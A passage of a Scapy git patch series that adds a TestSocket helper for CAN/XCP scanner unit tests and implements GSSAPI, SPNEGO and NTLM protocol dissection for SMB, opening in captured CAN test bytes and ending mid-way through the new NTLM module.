\x9a\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x08\xf8\xf3mTo\x9a\x04\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x083\xf4mTw\xbe\t\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x7f\x00\x00@\x08\x10*\x00\x00\x00\x003\xf4mT4\xc0\t\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x00\x00\x00\x80\x08\x10*\x11\x00\t\x06i\xf4mT\xb0\x88\x0c\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x07\xe5\x08\x7f\x00\x00L\x00\x00\x00\x00\x00\x00\x00i\xf4mT+\x89\x0c\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x07\xe4\x08\x7f\x00\x00P\x00\x00\x00\x00\x00\x00\x00i\xf4mT-\x89\x0c\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x07\xe4\x08\x7f\x00\x00P\x00\x00\x00\x00\x00\x00\x00i\xf4mTS\x89\x0c\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x07\xe4\x08\x7f\x00\x00P\x00\x00\x00\x00\x00\x00\x00i\xf4mT\x99\x89\x0c\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x07\xe4\x08\x00\x00\x00P\x00\x00\x00\x00\x00\x00\x00\x8e\xf4mT\x86\xc4\x04\x00\n\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01B\x92\xf4mT\xae\xf0\x07\x00\n\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\xba\xf4mT%\xaa\x0b\x00\n\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02c\xe8\xf4mT\xbc\x0f\x06\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x7f\x00\x00#\x00b\x01asdf\xe8\xf4mT\x07\x10\x06\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x00\x00\x00\x80\x00b\x01\x00\x00\x02\x06\x0f\xf5mT\x1c\x81\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x7f\x00\x00@\x00b\x01\x00\x00\x00\x00\x0f\xf5mT\xfe\x81\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x00\x00\x00\x80\x00b\x01\x00\x00\x02\x068\xf5mT\x19\xc3\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x7f\x00\x00\xa0\x08\x10\x00\x10\x00\x00\x008\xf5mTg\xc3\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x7f\x00\x00\xc2\x08\x10\x00\x15\x00\x00\x008\xf5mT\xd8\xc3\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x088\xf5mT\x17\xc4\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x06B\x08\x7f\x00\x00\xa3\x00\x00\x00\x00\x00\x00\x008\xf5mT\xca\xc4\x00\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x05\xc2\x08\x00\x00\x00\x80\x00\x00\x00!\x00\x00\x08') packets = rdpcap(pcap_fd) = Check if parsing worked: each packet has a CAN layer -all(CAN in pkt for pkt in packets) +assert all(CAN in pkt for pkt in packets) = Check if parsing worked: no packet has a Raw or Padding layer @@ -55,11 +57,11 @@ not any(Raw in pkt or Padding in pkt for pkt in packets) = Identifiers -set(pkt.identifier for pkt in packets) == {0, 1474, 1602, 1825, 1843, 1858, 1891, 2020, 2021} +assert set(pkt.identifier for pkt in packets) == {0, 1474, 1602, 1825, 1843, 1858, 1891, 2020, 2021} = Flags -set(pkt.flags for pkt in packets) == {0} +assert set(pkt.flags for pkt in packets) == {0} = Data length diff --git a/test/testsocket.py b/test/testsocket.py new file mode 100644 index 00000000000..2d06e4023b1 --- /dev/null +++ b/test/testsocket.py @@ -0,0 +1,117 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = TestSocket library for unit tests +# scapy.contrib.status = library + +import time + +from scapy.config import conf +import scapy.modules.six as six +from scapy.automaton import ObjectPipe, select_objects +from scapy.data import MTU +from scapy.packet import Packet +from scapy.plist import PacketList, SndRcvList +from scapy.compat import Optional, Type, Tuple, Any, List, cast +from scapy.supersocket import SuperSocket + + +open_test_sockets = list() # type: List[TestSocket] + + +class TestSocket(ObjectPipe, object): + nonblocking_socket = False # type: bool + + def __init__(self, basecls=None): + # type: (Optional[Type[Packet]]) -> None + global open_test_sockets + super(TestSocket, self).__init__() + self.basecls = basecls + self.paired_sockets = list() # type: List[TestSocket] + self.closed = False + open_test_sockets.append(self) + + def __enter__(self): + # type: () -> TestSocket + return self + + def __exit__(self, exc_type, exc_value, traceback): + # type: (Optional[Type[BaseException]], Optional[BaseException], Optional[Any]) -> None # noqa: E501 + """Close the socket""" + self.close() + + def close(self): + # type: () -> None + self.closed = True + super(TestSocket, self).close() + + def pair(self, sock): + # type: (TestSocket) -> None + self.paired_sockets += [sock] + sock.paired_sockets += [self] + + def send(self, x): + # type: (Packet) -> int + sx = bytes(x) + for r in self.paired_sockets: + super(TestSocket, r).send(sx) + try: + x.sent_time = time.time() + except AttributeError: + pass + return len(sx) + + def recv_raw(self, x=MTU): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 + """Returns a tuple containing (cls, pkt_data, time)""" + return self.basecls, \ + super(TestSocket, self).recv(), \ + time.time() + + def recv(self, x=MTU): + # type: (int) -> Optional[Packet] + if six.PY3: + return SuperSocket.recv(self, x) + else: + return SuperSocket.recv.im_func(self, x) + + def sr1(self, *args, **kargs): + # type: (Any, Any) -> Optional[Packet] + if six.PY3: + return SuperSocket.sr1(self, *args, **kargs) + else: + return SuperSocket.sr1.im_func(self, *args, **kargs) + + def sr(self, *args, **kargs): + # type: (Any, Any) -> Tuple[SndRcvList, PacketList] + if six.PY3: + return SuperSocket.sr(self, *args, **kargs) + else: + return SuperSocket.sr.im_func(self, *args, **kargs) + + def sniff(self, *args, **kargs): + # type: (Any, Any) -> PacketList + if six.PY3: + return SuperSocket.sniff(self, *args, **kargs) + else: + return SuperSocket.sniff.im_func(self, *args, **kargs) + + @staticmethod + def select(sockets, remain=conf.recv_poll_rate): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] + sock = [s for s in sockets if isinstance(s, ObjectPipe) and + not s._closed] + return cast(List[SuperSocket], select_objects(sock, remain)) + + +def cleanup_testsockets(): + # type: () -> None + """ + Helper function to remove TestSocket objects after a test + """ + global open_test_sockets + for sock in open_test_sockets: + sock.close() + del sock diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index f519c000e44..190a1c0d075 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -1,21 +1,14 @@ % Regression tests for the XCP_CAN -~ needs_root not_pypy automotive_comm - -# More information at http://www.secdev.org/projects/UTscapy/ - -############ -############ + Basic operations = Imports -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) +from test.testsocket import TestSocket, cleanup_testsockets + Tests XCPonCAN Scanner -= import XCP modules += modules load_contrib("automotive.xcp.xcp", globals_dict=globals()) load_contrib("automotive.xcp.scanner", globals_dict=globals()) @@ -35,12 +28,9 @@ slave_2_response = XCPOnCAN(identifier=response_id_2) / CTOResponse(packet_code= random_xcp_response_1 = XCPOnCAN(identifier=30) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x00\x00") random_xcp_response_2 = XCPOnCAN(identifier=40) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x00\x00") -sock1 = new_can_socket0() -sock1.basecls = XCPOnCAN - -sock2 = new_can_socket0() -sock2.basecls = XCPOnCAN - +sock1 = TestSocket(XCPOnCAN) +sock2 = TestSocket(XCPOnCAN) +sock1.pair(sock2) def ecu(): for i in range(50, 53): @@ -82,11 +72,9 @@ connect_response = XCPOnCAN(identifier=response_id) / CTOResponse(packet_code=0x random_xcp_response_1 = XCPOnCAN(identifier=30) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x00\x00") random_xcp_response_2 = XCPOnCAN(identifier=40) / CTOResponse(packet_code=0xFF) / GenericResponse(b"\x10") -sock1 = new_can_socket0() -sock1.basecls = XCPOnCAN - -sock2 = new_can_socket0() -sock2.basecls = XCPOnCAN +sock1 = TestSocket(XCPOnCAN) +sock2 = TestSocket(XCPOnCAN) +sock1.pair(sock2) def ecu(): @@ -120,6 +108,6 @@ assert result[0].response_id == response_id + Cleanup -= Delete vcan interfaces += Delete TestSockets -assert cleanup_interfaces() +cleanup_testsockets() From f771f2fa038b6aa251506cc21f427c703230c0d1 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 4 Oct 2021 17:20:17 +0200 Subject: [PATCH 0679/1632] Implement SMB1->GSSAPI (SPNEGO)->NTLM --- scapy/asn1/asn1.py | 1 - scapy/asn1/mib.py | 36 +- scapy/asn1fields.py | 24 +- scapy/fields.py | 45 ++- scapy/layers/gssapi.py | 205 +++++++++++ scapy/layers/netbios.py | 20 +- scapy/layers/ntlm.py | 471 ++++++++++++++++++++++++ scapy/layers/smb.py | 746 ++++++++++++++++++++++++-------------- scapy/packet.py | 12 +- test/scapy/layers/smb.uts | 107 +++++- tox.ini | 1 + 11 files changed, 1344 insertions(+), 324 deletions(-) create mode 100644 scapy/layers/gssapi.py create mode 100644 scapy/layers/ntlm.py diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 672abfff805..1fb95885c4c 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -19,7 +19,6 @@ from scapy.utils import Enum_metaclass, EnumElement, binrepr from scapy.compat import plain_str, bytes_encode, chb, orb import scapy.modules.six as six -from scapy.modules.six.moves import range from scapy.compat import ( Any, diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 3a6d65caace..6109047bb39 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -31,7 +31,8 @@ _mib_re_integer = re.compile(r"^[0-9]+$") _mib_re_both = re.compile(r"^([a-zA-Z_][a-zA-Z0-9_-]*)\(([0-9]+)\)$") -_mib_re_oiddecl = re.compile(r"$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}", re.M) # noqa: E501 +_mib_re_oiddecl = re.compile( + r"$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}", re.M) _mib_re_strings = re.compile(r'"[^"]*"') _mib_re_comments = re.compile(r'--.*(\r|\n)') @@ -569,19 +570,19 @@ def load_mib(filenames): '1.2.392.200091.100.721.1': 'EV Security Communication RootCA1', '1.2.616.1.113527.2.5.1.1': 'EV Certum Trusted Network CA', '1.3.159.1.17.1': 'EV Actualis Authentication Root CA', - '1.3.6.1.4.1.13177.10.1.3.10': 'EV Autoridad de Certificacion Firmaprofesional CIF A62634068', # noqa: E501 + '1.3.6.1.4.1.13177.10.1.3.10': 'EV Autoridad de Certificacion Firmaprofesional CIF A62634068', '1.3.6.1.4.1.14370.1.6': 'EV GeoTrust Primary Certification Authority', '1.3.6.1.4.1.14777.6.1.1': 'EV Izenpe.com roots Business', '1.3.6.1.4.1.14777.6.1.2': 'EV Izenpe.com roots Government', - '1.3.6.1.4.1.17326.10.14.2.1.2': 'EV AC Camerfirma S.A. Chambers of Commerce Root - 2008', # noqa: E501 - '1.3.6.1.4.1.17326.10.14.2.2.2': 'EV AC Camerfirma S.A. Chambers of Commerce Root - 2008', # noqa: E501 - '1.3.6.1.4.1.17326.10.8.12.1.2': 'EV AC Camerfirma S.A. Global Chambersign Root - 2008', # noqa: E501 - '1.3.6.1.4.1.17326.10.8.12.2.2': 'EV AC Camerfirma S.A. Global Chambersign Root - 2008', # noqa: E501 - '1.3.6.1.4.1.22234.2.5.2.3.1': 'EV CertPlus Class 2 Primary CA (KEYNECTIS)', # noqa: E501 + '1.3.6.1.4.1.17326.10.14.2.1.2': 'EV AC Camerfirma S.A. Chambers of Commerce Root - 2008', + '1.3.6.1.4.1.17326.10.14.2.2.2': 'EV AC Camerfirma S.A. Chambers of Commerce Root - 2008', + '1.3.6.1.4.1.17326.10.8.12.1.2': 'EV AC Camerfirma S.A. Global Chambersign Root - 2008', + '1.3.6.1.4.1.17326.10.8.12.2.2': 'EV AC Camerfirma S.A. Global Chambersign Root - 2008', + '1.3.6.1.4.1.22234.2.5.2.3.1': 'EV CertPlus Class 2 Primary CA (KEYNECTIS)', '1.3.6.1.4.1.23223.1.1.1': 'EV StartCom Certification Authority', - '1.3.6.1.4.1.29836.1.10': 'EV China Internet Network Information Center EV Certificates Root', # noqa: E501 + '1.3.6.1.4.1.29836.1.10': 'EV China Internet Network Information Center EV Certificates Root', '1.3.6.1.4.1.311.60.2.1.1': 'jurisdictionOfIncorporationLocalityName', - '1.3.6.1.4.1.311.60.2.1.2': 'jurisdictionOfIncorporationStateOrProvinceName', # noqa: E501 + '1.3.6.1.4.1.311.60.2.1.2': 'jurisdictionOfIncorporationStateOrProvinceName', '1.3.6.1.4.1.311.60.2.1.3': 'jurisdictionOfIncorporationCountryName', '1.3.6.1.4.1.34697.2.1': 'EV AffirmTrust Commercial', '1.3.6.1.4.1.34697.2.2': 'EV AffirmTrust Networking', @@ -605,12 +606,20 @@ def load_mib(filenames): '2.16.840.1.113733.1.7.23.6': 'EV VeriSign Certification Authorities', '2.16.840.1.113733.1.7.48.1': 'EV thawte CAs', '2.16.840.1.114028.10.1.2': 'EV Entrust Certification Authority', - '2.16.840.1.114171.500.9': 'EV Wells Fargo WellsSecure Public Root Certification Authority', # noqa: E501 + '2.16.840.1.114171.500.9': 'EV Wells Fargo WellsSecure Public Root Certification Authority', '2.16.840.1.114404.1.1.2.4.1': 'EV XRamp Global Certification Authority', '2.16.840.1.114412.2.1': 'EV DigiCert High Assurance EV Root CA', - '2.16.840.1.114413.1.7.23.3': 'EV ValiCert Class 2 Policy Validation Authority', # noqa: E501 + '2.16.840.1.114413.1.7.23.3': 'EV ValiCert Class 2 Policy Validation Authority', '2.16.840.1.114414.1.7.23.3': 'EV Starfield Certificate Authority', - '2.16.840.1.114414.1.7.24.3': 'EV Starfield Service Certificate Authority' # noqa: E501 + '2.16.840.1.114414.1.7.24.3': 'EV Starfield Service Certificate Authority' +} + +# + +gssapi_oids = { + '1.3.6.1.5.5.2': 'SPNEGO - Simple Protected Negotiation', + '1.3.6.1.4.1.311.2.2.10': 'NTLMSSP - Microsoft NTLM Security Support Provider', + '1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism', } @@ -630,7 +639,8 @@ def load_mib(filenames): x962KeyType_oids, x962Signature_oids, ansiX962Curve_oids, - certicomCurve_oids + certicomCurve_oids, + gssapi_oids, ] x509_oids = {} diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index ec4bc773989..0e58066afed 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -41,11 +41,11 @@ from scapy import packet from functools import reduce import scapy.modules.six as six -from scapy.modules.six.moves import range from scapy.compat import ( Any, AnyStr, + Callable, Dict, Generic, List, @@ -175,12 +175,13 @@ def any2i(self, pkt, x): def extract_packet(self, cls, # type: Type[ASN1_Packet] s, # type: bytes + _underlayer=None # type: Optional[ASN1_Packet] ): # type: (...) -> Tuple[ASN1_Packet, bytes] try: - c = cls(s) + c = cls(s, _underlayer=_underlayer) except ASN1F_badsequence: - c = packet.Raw(s) + c = packet.Raw(s, _underlayer=_underlayer) cpad = c.getlayer(packet.Raw) s = b"" if cpad is not None: @@ -545,7 +546,7 @@ def m2i(self, i, s, remain = codec.check_type_check_len(s) lst = [] while s: - c, s = self.extract_packet(self.cls, s) + c, s = self.extract_packet(self.cls, s, _underlayer=pkt) if c: lst.append(c) if len(s) > 0: @@ -702,7 +703,7 @@ def m2i(self, pkt, s): if hasattr(choice, "ASN1_root"): choice = cast('ASN1_Packet', choice) # we don't want to import ASN1_Packet in this module... - return self.extract_packet(choice, s) + return self.extract_packet(choice, s, _underlayer=pkt) elif isinstance(choice, type): return choice(self.name, b"").m2i(pkt, s) else: @@ -748,9 +749,11 @@ def __init__(self, context=None, # type: Optional[Any] implicit_tag=None, # type: Optional[int] explicit_tag=None, # type: Optional[int] + next_cls_cb=None, # type: Optional[Callable[[ASN1_Packet], Type[ASN1_Packet]]] # noqa: E501 ): # type: (...) -> None self.cls = cls + self.next_cls_cb = next_cls_cb super(ASN1F_PACKET, self).__init__( name, None, context=context, implicit_tag=implicit_tag, explicit_tag=explicit_tag @@ -762,7 +765,11 @@ def __init__(self, def m2i(self, pkt, s): # type: (ASN1_Packet, bytes) -> Tuple[Any, bytes] - diff_tag, s = BER_tagging_dec(s, hidden_tag=self.cls.ASN1_root.ASN1_tag, # noqa: E501 + if self.next_cls_cb: + cls = self.next_cls_cb(pkt) or self.cls + else: + cls = self.cls + diff_tag, s = BER_tagging_dec(s, hidden_tag=cls.ASN1_root.ASN1_tag, # noqa: E501 implicit_tag=self.implicit_tag, explicit_tag=self.explicit_tag, safe=self.flexible_tag) @@ -773,7 +780,7 @@ def m2i(self, pkt, s): self.explicit_tag = diff_tag if not s: return None, s - return self.extract_packet(self.cls, s) + return self.extract_packet(cls, s, _underlayer=pkt) def i2m(self, pkt, # type: ASN1_Packet @@ -828,7 +835,8 @@ def m2i(self, pkt, s): # type: ignore if len(bit_string.val) % 8 != 0: raise BER_Decoding_Error("wrong bit string", remaining=s) if bit_string.val_readable: - p, s = self.extract_packet(self.cls, bit_string.val_readable) + p, s = self.extract_packet(self.cls, bit_string.val_readable, + _underlayer=pkt) else: return None, bit_string.val_readable if len(s) > 0: diff --git a/scapy/fields.py b/scapy/fields.py index 8b34eb414e8..bbb321ae306 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1858,7 +1858,10 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str - return plain_str(self.i2h(pkt, x)) + try: + return plain_str(self.i2h(pkt, x)) + except ValueError: + return plain_str(x) + " [invalid encoding]" def i2h(self, pkt, # type: Optional[Packet] @@ -2008,24 +2011,38 @@ def i2m(self, pkt, x): class StrNullField(StrField): + DELIMITER = b"\x00" + ALIGNMENT = 1 + def addfield(self, pkt, s, val): # type: (Packet, bytes, Optional[bytes]) -> bytes - return s + self.i2m(pkt, val) + b"\x00" + return s + self.i2m(pkt, val) + self.DELIMITER def getfield(self, pkt, # type: Packet s, # type: bytes ): # type: (...) -> Tuple[bytes, bytes] - len_str = s.find(b"\x00") - if len_str < 0: - # \x00 not found: return empty - return b"", s - return s[len_str + 1:], self.m2i(pkt, s[:len_str]) + len_str = 0 + while True: + len_str = s.find(self.DELIMITER, len_str) + if len_str < 0: + # DELIMITER not found: return empty + return b"", s + if len_str % self.ALIGNMENT: + len_str += 1 + else: + break + return s[len_str + len(self.DELIMITER):], self.m2i(pkt, s[:len_str]) def randval(self): # type: () -> RandTermString - return RandTermString(RandNum(0, 1200), b"\x00") + return RandTermString(RandNum(0, 1200), self.DELIMITER) + + +class StrNullFieldUtf16(StrNullField, StrFieldUtf16): + DELIMITER = b"\x00\x00" + ALIGNMENT = 2 class StrStopField(StrField): @@ -2042,7 +2059,6 @@ def getfield(self, pkt, s): len_str = s.find(self.stop) if len_str < 0: return b"", s -# raise Scapy_Exception,"StrStopField: stop value [%s] not found" %stop # noqa: E501 len_str += len(self.stop) + self.additional return s[len_str:], s[:len_str] @@ -3182,7 +3198,7 @@ def __init__( class UTCTimeField(Field[float, int]): __slots__ = ["epoch", "delta", "strf", - "use_msec", "use_micro", "use_nano"] + "use_msec", "use_micro", "use_nano", "custom_scaling"] # Do not change the order of the keywords in here # Netflow heavily rely on this @@ -3194,9 +3210,11 @@ def __init__(self, use_nano=False, # type: bool epoch=None, # type: Optional[Tuple[int, int, int, int, int, int, int, int, int]] # noqa: E501 strf="%a, %d %b %Y %H:%M:%S %z", # type: str + custom_scaling=None, # type: Optional[int] + fmt="I" # type: str ): # type: (...) -> None - Field.__init__(self, name, default, "I") + Field.__init__(self, name, default, fmt=fmt) mk_epoch = EPOCH if epoch is None else calendar.timegm(epoch) self.epoch = mk_epoch self.delta = mk_epoch - EPOCH @@ -3204,17 +3222,20 @@ def __init__(self, self.use_msec = use_msec self.use_micro = use_micro self.use_nano = use_nano + self.custom_scaling = custom_scaling def i2repr(self, pkt, x): # type: (Optional[Packet], float) -> str if x is None: - x = 0 + x = -self.delta elif self.use_msec: x = x / 1e3 elif self.use_micro: x = x / 1e6 elif self.use_nano: x = x / 1e9 + elif self.custom_scaling: + x = x / self.custom_scaling x = int(x) + self.delta t = time.strftime(self.strf, time.gmtime(x)) return "%s (%d)" % (t, x) diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py new file mode 100644 index 00000000000..4b6f66bcd1d --- /dev/null +++ b/scapy/layers/gssapi.py @@ -0,0 +1,205 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Gabriel Potter +# This program is published under a GPLv2 license + +""" +Generic Security Services (GSS) API + +Implements parts of +- GSSAPI: RFC2743 +- GSSAPI SPNEGO: RFC4178 > RFC2478 +""" + +from scapy.asn1.asn1 import ASN1_SEQUENCE, ASN1_Class_UNIVERSAL, ASN1_Codecs +from scapy.asn1.ber import BERcodec_SEQUENCE +from scapy.asn1.mib import conf # loads conf.mib +from scapy.asn1fields import ( + ASN1F_CHOICE, + ASN1F_ENUMERATED, + ASN1F_FLAGS, + ASN1F_OID, + ASN1F_PACKET, + ASN1F_SEQUENCE, + ASN1F_SEQUENCE_OF, + ASN1F_STRING, + ASN1F_optional +) +from scapy.asn1packet import ASN1_Packet +from scapy.layers.ntlm import NTLM_Header + + +# https://datatracker.ietf.org/doc/html/rfc1508#page-48 + + +class ASN1_Class_GSSAPI(ASN1_Class_UNIVERSAL): + name = "GSSAPI" + APPLICATION = 0x60 + + +class ASN1_GSSAPI_APPLICATION(ASN1_SEQUENCE): + tag = ASN1_Class_GSSAPI.APPLICATION + + +class BERcodec_GSSAPI_APPLICATION(BERcodec_SEQUENCE): + tag = ASN1_Class_GSSAPI.APPLICATION + + +class ASN1F_SNMP_GSSAPI_APPLICATION(ASN1F_SEQUENCE): + ASN1_tag = ASN1_Class_GSSAPI.APPLICATION + +# SPNEGO negTokenInit +# https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.1 + + +class SPNEGO_MechType(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_OID("oid", None) + + +class SPNEGO_MechTypes(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("mechTypes", None, SPNEGO_MechType) + + +class SPNEGO_MechListMIC(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_STRING("value", "") + + +_mechDissector = { + "1.3.6.1.4.1.311.2.2.10": NTLM_Header, # NTLM +} + + +class _SPNEGO_Token_Field(ASN1F_STRING): + def i2m(self, pkt, x): + return super().i2m(pkt, bytes(x)) + + def m2i(self, pkt, s): + dat, r = super(_SPNEGO_Token_Field, self).m2i(pkt, s) + if isinstance(pkt.underlayer, SPNEGO_negTokenInit): + types = pkt.underlayer.mechTypes + elif isinstance(pkt.underlayer, SPNEGO_negTokenResp): + types = [pkt.underlayer.supportedMech] + if types and types[0] and types[0].oid.val in _mechDissector: + return _mechDissector[types[0].oid.val](dat.val), r + return dat, r + + +class SPNEGO_Token(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = _SPNEGO_Token_Field("value", None) + + +_ContextFlags = ["delegFlag", + "mutualFlag", + "replayFlag", + "sequenceFlag", + "superseded", + "anonFlag", + "confFlag", + "integFlag"] + + +class SPNEGO_negTokenInit(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_SEQUENCE_OF("mechTypes", None, SPNEGO_MechType, + explicit_tag=0xa0) + ), + ASN1F_optional( + ASN1F_FLAGS("reqFlags", None, _ContextFlags, + implicit_tag=0x81)), + ASN1F_optional( + ASN1F_PACKET("mechToken", SPNEGO_Token(), SPNEGO_Token, + explicit_tag=0xa2) + ), + ASN1F_optional( + ASN1F_PACKET("mechListMIC", SPNEGO_MechListMIC(), + SPNEGO_MechListMIC, + implicit_tag=0xa3) + ) + ) + ) + + +# SPNEGO negTokenTarg +# https://datatracker.ietf.org/doc/html/rfc4178#section-4.2.2 + +class SPNEGO_negTokenResp(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_SEQUENCE( + ASN1F_optional( + ASN1F_ENUMERATED("negResult", 0, + {0: "accept-completed", + 1: "accept-incomplete", + 2: "reject", + 3: "request-mic"}, + explicit_tag=0xa0), + ), + ASN1F_optional( + ASN1F_PACKET("supportedMech", SPNEGO_MechType(), + SPNEGO_MechType, + explicit_tag=0xa1), + ), + ASN1F_optional( + ASN1F_PACKET("responseToken", SPNEGO_Token(), + SPNEGO_Token, + explicit_tag=0xa2) + ), + ASN1F_optional( + ASN1F_PACKET("mechListMIC", SPNEGO_MechListMIC(), + SPNEGO_MechListMIC, + implicit_tag=0xa3) + ) + ) + ) + + +class SPNEGO_negToken(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE("token", SPNEGO_negTokenInit(), + ASN1F_PACKET("negTokenInit", + SPNEGO_negTokenInit(), + SPNEGO_negTokenInit, + implicit_tag=0xa0), + ASN1F_PACKET("negTokenResp", + SPNEGO_negTokenResp(), + SPNEGO_negTokenResp, + implicit_tag=0xa1) + ) + + +# GSS API Blob +# https://datatracker.ietf.org/doc/html/rfc2743 + + +_GSSAPI_OIDS = { + "1.3.6.1.5.5.2": SPNEGO_negToken, # SPNEGO: RFC rfc2478 +} + +# sect 3.1 + + +class GSSAPI_BLOB(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SNMP_GSSAPI_APPLICATION( + ASN1F_OID("MechType", "1.3.6.1.5.5.2"), + ASN1F_PACKET("innerContextToken", SPNEGO_negToken(), SPNEGO_negToken, + next_cls_cb=lambda pkt: _GSSAPI_OIDS.get( + pkt.MechType.val, conf.raw_layer)) + ) + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 1: + if ord(_pkt[:1]) & 0xa0 >= 0xa0: + # XXX: sometimes the token is raw, we should look from + # the session what to use here. For now: hardcode SPNEGO + # (THIS IS A VERY STRONG ASSUMPTION) + return SPNEGO_negToken + return cls diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 6f2c9595696..80a7a6d1cf7 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -11,7 +11,7 @@ import struct -from scapy.packet import Packet, bind_layers +from scapy.packet import Packet, bind_bottom_up, bind_layers from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ IPField, IntField, NetBIOSNameField, ShortEnumField, ShortField, \ StrFixedLenField, XShortField @@ -275,7 +275,13 @@ class NBTSession(Packet): 0x84: "Retarget Session Response", 0x85: "Session Keepalive"}), BitField("RESERVED", 0x00, 7), - BitField("LENGTH", 0, 17)] + BitField("LENGTH", None, 17)] + + def post_build(self, pkt, pay): + if self.LENGTH is None: + length = len(pay) & (2**18 - 1) + pkt = pkt[:1] + struct.pack("!I", length)[1:] + return pkt + pay bind_layers(UDP, NBNSQueryRequest, dport=137) @@ -289,7 +295,9 @@ class NBTSession(Packet): bind_layers(NBNSNodeStatusResponseService, NBNSNodeStatusResponseEnd, ) bind_layers(UDP, NBNSWackResponse, sport=137) bind_layers(UDP, NBTDatagram, dport=138) -bind_layers(TCP, NBTSession, dport=445) -bind_layers(TCP, NBTSession, sport=445) -bind_layers(TCP, NBTSession, dport=139) -bind_layers(TCP, NBTSession, sport=139) + +bind_bottom_up(TCP, NBTSession, dport=445) +bind_bottom_up(TCP, NBTSession, sport=445) +bind_bottom_up(TCP, NBTSession, dport=139) +bind_bottom_up(TCP, NBTSession, sport=139) +bind_layers(TCP, NBTSession, dport=139, sport=139) diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py new file mode 100644 index 00000000000..ccf5b0be26c --- /dev/null +++ b/scapy/layers/ntlm.py @@ -0,0 +1,471 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Gabriel Potter +# This program is published under a GPLv2 license + +""" +NTLM + +https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-NLMP/%5bMS-NLMP%5d.pdf +""" + +import struct +from scapy.compat import bytes_base64 +from scapy.config import conf +from scapy.fields import ( + Field, + ByteEnumField, + ByteField, + FieldLenField, + FlagsField, + LEIntField, + _StrField, + LEShortEnumField, + MultipleTypeField, + PacketField, + PacketListField, + LEShortField, + StrField, + StrFieldUtf16, + StrFixedLenField, + 